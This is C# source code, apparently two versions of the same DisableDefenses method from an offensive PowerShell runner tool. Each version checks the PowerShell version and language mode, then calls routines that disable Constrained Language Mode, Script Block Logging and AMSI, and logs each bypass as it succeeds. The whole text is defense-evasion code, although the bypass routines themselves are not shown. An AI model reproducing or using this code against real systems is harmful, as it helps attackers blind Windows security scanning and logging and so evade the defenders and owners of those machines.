private static bool DisableDefenses(PowerShell rs, CustomPSHost host) { bool ret = true; ret &= DisableClm.DoDisable(rs); string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true); Info($"[.] Language Mode: {l}"); if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase)) { Info("[+] Constrained Language Mode Disabled."); } else { Info("[-] Constrained Language Mode not disabled."); } if ((ret &= DisableScriptLogging(rs))) { Info("[+] Script Block Logging Disabled."); } else { Info("[-] Script Block Logging not disabled."); } if ((ret &= DisableAmsi(rs))) { Info("[+] AMSI Disabled."); } else { Info("[-] AMSI not disabled."); } return(ret); }
private static bool DisableDefenses(PowerShell rs, CustomPSHost host) { bool ret = true; string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim(); float psversion = 5; try { System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone(); customCulture.NumberFormat.NumberDecimalSeparator = "."; System.Threading.Thread.CurrentThread.CurrentCulture = customCulture; psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture); } catch (FormatException e) { Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}"); } if (psversion < 5.0 && !ProgramOptions.Force) { Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)"); Info("Skipping bypass procedures..."); return(ret); } else { Info($"[.] Powershell's version: {psversion}"); } l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim(); Info($"[.] Language Mode: {l}"); if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase)) { DisableClm.DoDisable(rs, host, ProgramOptions.Verbose); CleanupNeeded = true; l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim(); Info($"[.] Language Mode after attempting to disable CLM: {l}"); if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase)) { Info("[+] Constrained Language Mode Disabled."); ret &= true; } else { Info("[-] Constrained Language Mode not disabled."); ret &= false; } } else { Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage."); } if ((ret &= DisableScriptLogging(rs))) { Info("[+] Script Block Logging Disabled."); } else { Info("[-] Script Block Logging not disabled."); } if ((ret &= DisableAmsi(rs))) { Info("[+] AMSI Disabled."); } else { Info("[-] AMSI not disabled."); } Info(""); return(ret); }